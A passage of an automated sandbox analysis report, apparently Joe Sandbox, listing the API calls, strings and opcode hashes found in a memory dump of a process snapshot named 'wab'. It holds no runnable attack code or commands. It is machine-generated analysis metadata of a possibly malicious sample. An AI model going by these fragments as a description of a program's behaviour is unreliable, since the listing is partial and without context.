                                • API ID: Window$ItemMessageRectSend$Client
                                • String ID:
                                • API String ID: 2047574939-0
                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                • String ID:
                                • API String ID: 4218492932-0
                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                APIs
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                • memcpy.MSVCRT ref: 0044A8BF
                                • memcpy.MSVCRT ref: 0044A90C
                                • memcpy.MSVCRT ref: 0044A988
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                • memcpy.MSVCRT ref: 0044A9D8
                                • memcpy.MSVCRT ref: 0044AA19
                                • memcpy.MSVCRT ref: 0044AA4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                • API String ID: 3510742995-2446657581
                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                • memset.MSVCRT ref: 00405ABB
                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                • SetFocus.USER32(?), ref: 00405B76
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfwcscat
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 384018552-4153097237
                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetwcschr
                                • String ID: 0$6
                                • API String ID: 2029023288-3849865405
                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                APIs
                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                • memset.MSVCRT ref: 00405455
                                • memset.MSVCRT ref: 0040546C
                                • memset.MSVCRT ref: 00405483
                                • memcpy.MSVCRT ref: 00405498
                                • memcpy.MSVCRT ref: 004054AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy$ErrorLast
                                • String ID: 6$\
                                • API String ID: 404372293-1284684873
                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                • wcscpy.MSVCRT ref: 0040A0D9
                                • wcscat.MSVCRT ref: 0040A0E6
                                • wcscat.MSVCRT ref: 0040A0F5
                                • wcscpy.MSVCRT ref: 0040A107
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                • String ID:
                                • API String ID: 1331804452-0
                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                APIs
                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                • String ID: advapi32.dll
                                • API String ID: 2012295524-4050573280
                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                APIs
                                Strings
                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                • <%s>, xrefs: 004100A6
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3473751417-2880344631
                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$_snwprintfmemset
                                • String ID: %2.2X
                                • API String ID: 2521778956-791839006
                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfwcscpy
                                • String ID: dialog_%d$general$menu_%d$strings
                                • API String ID: 999028693-502967061
                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memsetstrlen
                                • String ID:
                                • API String ID: 2350177629-0
                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-1606337402
                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 265355444-0
                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                • memset.MSVCRT ref: 0040C439
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                • _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                • memset.MSVCRT ref: 0040C4D0
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                • String ID:
                                • API String ID: 1973883786-0
                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                APIs
                                • memset.MSVCRT ref: 004116FF
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2618321458-3614832568
                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                APIs
                                • memset.MSVCRT ref: 004185FC
                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@AttributesFilememset
                                • String ID:
                                • API String ID: 776155459-0
                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                • malloc.MSVCRT ref: 00417524
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                • String ID:
                                • API String ID: 2308052813-0
                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                APIs
                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PathTemp$??3@
                                • String ID: %s\etilqs_$etilqs_
                                • API String ID: 1589464350-1420421710
                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                APIs
                                • memset.MSVCRT ref: 0040FDD5
                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 0040FE1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 1775345501-2769808009
                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                APIs
                                • wcscpy.MSVCRT ref: 0041477F
                                • wcscpy.MSVCRT ref: 0041479A
                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$CloseCreateFileHandle
                                • String ID: General
                                • API String ID: 999786162-26480598
                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLastMessage_snwprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 313946961-1552265934
                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: foreign key constraint failed$new$oid$old
                                • API String ID: 0-1953309616
                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                APIs
                                Strings
                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                APIs
                                Strings
                                Memory Dump Source
